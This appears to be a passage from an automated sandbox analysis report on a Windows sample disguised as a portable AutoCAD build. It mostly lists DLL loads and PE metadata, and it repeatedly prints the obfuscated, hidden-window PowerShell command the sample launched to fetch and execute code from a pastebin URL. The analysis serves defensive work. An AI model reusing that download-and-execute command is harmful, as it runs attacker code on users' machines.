Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.4.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: OSLdZanXNc.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: OSLdZanXNc.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2601444821.000002422026F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\adminalt\Autodesk.AutoCAD.2023.x64.Portable\x64\Release\PePacker.pdb source: OSLdZanXNc.exe
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2602749668.0000024220650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2601758086.000002422057E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb& source: powershell.exe, 00000004.00000002.2602273383.00000242205D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.2601063159.00000242201FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000004.00000002.2600442487.00000242201DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbpr source: powershell.exe, 00000004.00000002.2601758086.000002422057E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089" source: powershell.exe, 00000004.00000002.2602273383.000002422061C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbB source: powershell.exe, 00000004.00000002.2602749668.0000024220650000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000002.2601758086.000002422057E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2602668444.0000024220629000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbv source: powershell.exe, 00000004.00000002.2602273383.00000242205D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbw source: powershell.exe, 00000004.00000002.2600442487.00000242201DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb? source: powershell.exe, 00000004.00000002.2600442487.00000242201DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbA59A source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\adminalt\Autodesk.AutoCAD.2023.x64.Portable\x64\Release\PePacker.pdb) source: OSLdZanXNc.exe
Source: Binary string: ws\dll\System.Management.Automation.pdb| source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb[ source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb source: powershell.exe, 00000004.00000002.2602749668.0000024220650000.00000004.00000020.00020000.00000000.sdmp
Source: OSLdZanXNc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: OSLdZanXNc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: OSLdZanXNc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: OSLdZanXNc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: OSLdZanXNc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE16625BFF push eax; iretd 4_2_00007FFE16625C09
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE166F4490 pushfd ; retf 4_2_00007FFE166F4491
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE166F0587 push eax; ret 4_2_00007FFE166F0592
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFE16644284 push eax; ret 12_2_00007FFE1664428D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFE16717BCA pushad ; ret 12_2_00007FFE16717BCD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFE16716DC3 push edi; iretd 12_2_00007FFE16716DC6
